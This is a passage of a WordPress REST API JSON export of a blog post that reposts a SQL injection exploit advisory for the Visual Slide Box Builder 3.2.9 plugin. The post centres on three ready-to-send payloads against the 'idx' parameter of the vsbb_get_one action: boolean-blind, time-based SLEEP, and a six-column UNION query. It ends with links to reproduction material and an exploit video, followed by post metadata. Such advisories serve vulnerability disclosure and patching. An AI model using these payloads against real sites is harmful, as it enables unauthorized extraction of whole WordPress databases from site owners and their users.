## Title: WordPress 6.0 – Visual Slide Box Builder 3.2.9 SQLi
\n## Author: nu11secur1ty
\n## Date: 07.11.2022
\n## Vendor: https:\/\/wphive.com\/
\n## Software: https:\/\/wphive.com\/plugins\/wp-visual-slidebox-builder\/?plugin_version=3.2.9
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Visual-Slide-Box-Builder-plugin<\/p>\n
## Description:
\nThe parameter `idx` from the Visual Slide Box Builder plugin app for
\nWordPress appears to be vulnerable to SQLi.
\nThe attacker can receive all database information from the WordPress
\ndatabase and he can use it for very malicious purposes.<\/p>\n
[+] Payloads:<\/p>\n
“`mysql
\n—
\nParameter: idx (GET)
\nType: boolean-based blind
\nTitle: HAVING boolean-based blind – WHERE, GROUP BY clause
\nPayload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
\nHAVING 1854=1854<\/p>\n
Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
\nAND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)<\/p>\n
Type: UNION query
\nTitle: MySQL UNION query (NULL) – 6 columns
\nPayload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
\nNULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
\n—<\/p>\n
“`<\/p>\n
## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Visual-Slide-Box-Builder-plugin)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/streamable.com\/jlp5sx)<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: WordPress 6.0 – Visual Slide Box Builder 3.2.9 SQLi ## Author: nu11secur1ty ## Date: 07.11.2022 ## Vendor: https:\/\/wphive.com\/ ## Software: https:\/\/wphive.com\/plugins\/wp-visual-slidebox-builder\/?plugin_version=3.2.9 ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/WordPress\/2022\/Visual-Slide-Box-Builder-plugin ## Description: The parameter `idx` from the Visual Slide Box Builder plugin app for WordPress appears to be vulnerable to SQLi. The attacker can receive all database information from …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27072","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27072"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27072\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}